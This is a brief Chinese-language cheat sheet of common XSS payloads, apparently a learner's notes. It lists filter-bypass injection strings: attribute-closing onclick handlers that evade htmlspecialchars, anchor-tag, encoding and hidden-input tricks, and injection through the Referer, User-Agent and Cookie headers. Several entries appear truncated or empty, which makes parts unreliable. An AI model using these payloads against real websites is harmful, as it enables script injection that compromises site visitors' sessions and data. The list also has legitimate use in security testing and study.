XSS常用Payload

1.普通的

1">
2.绕过htmlspecialchars方法，先闭合输入，再使用事件来绕过
' onclick ='javascript:alert(1)'//
" onclick ='javascript:alert(1)'//

3.<> script onclick被过滤，用a标签绕过
">asd//

4.重写绕过
1">alert(1)

5.Unicode编码绕过
javascript:alert(1)

6.使用type=text来显示被隐藏的标签，再用事件
&t_sort=" type='text' οnclick='javascript:alert(1)'>//

7.referer UserAgent Cookie等地方也可以进行xss测试
referer:" type='text' οnclick='javascript:alert(1)'>//

8.图片

'

9.用这些字符来测试哪些被过滤了
“ ‘ <> script onerror  onclick
10.空格用回车编码代替